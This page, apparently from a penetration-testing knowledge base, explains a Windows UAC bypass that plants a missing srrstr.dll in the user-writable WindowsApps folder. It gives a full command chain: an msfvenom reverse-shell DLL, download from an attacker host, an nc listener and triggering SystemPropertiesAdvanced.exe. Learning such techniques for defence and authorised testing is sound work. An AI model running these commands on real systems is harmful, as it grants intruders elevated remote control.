Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 04. Windows / 02. Privilege Escalation / UAC Bypass

DLL Search Order

Some UAC bypasses abuse auto-elevating Windows binaries that attempt to load missing DLLs.

If the DLL search path includes a writable user-controlled directory, an attacker may be able to place a malicious DLL there and trigger elevated loading.

Windows commonly searches DLLs in this order:

  1. The directory from which the application was loaded
  2. C:\Windows\System32
  3. C:\Windows\System
  4. C:\Windows
  5. Directories listed in the PATH environment variable

One known example involves the 32-bit version of:

C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

This binary may attempt to load:

srrstr.dll

If a writable directory appears in the search path, a malicious DLL with the same name may be loaded in an elevated context. (Usually WindowsApps is writeable by the user)

Enumeration

Review the current PATH:

cmd /c echo %PATH%

Check whether the user's WindowsApps directory exists:

dir "%LOCALAPPDATA%\Microsoft\WindowsApps"

Check permissions:

icacls "%LOCALAPPDATA%\Microsoft\WindowsApps"

Interesting findings include:

  • Writable user directory in %PATH%
  • Missing DLL loaded by an auto-elevating binary
  • Vulnerable Windows build
  • Compatible UAC settings
  • Current user is a local administrator

Exploit

  1. Confirm the current user is a local administrator
  2. Confirm the target build is vulnerable
  3. Identify the missing DLL name
  4. Place a malicious DLL in the writable search path
  5. Trigger the auto-elevating binary
  6. Verify elevated execution

Generate the DLL:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f dll -o srrstr.dll

The SysWOW64 binary is 32-bit, so the DLL must also be 32-bit.

Host the DLL:

python3 -m http.server 8080

Download it to the target:

Invoke-WebRequest -Uri "http://10.10.14.3:8080/srrstr.dll" -OutFile "$env:LOCALAPPDATA\Microsoft\WindowsApps\srrstr.dll"

Start a listener:

nc -lvnp 4444

Trigger the auto-elevating binary:

C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

If the technique succeeds, the DLL is loaded by the elevated process.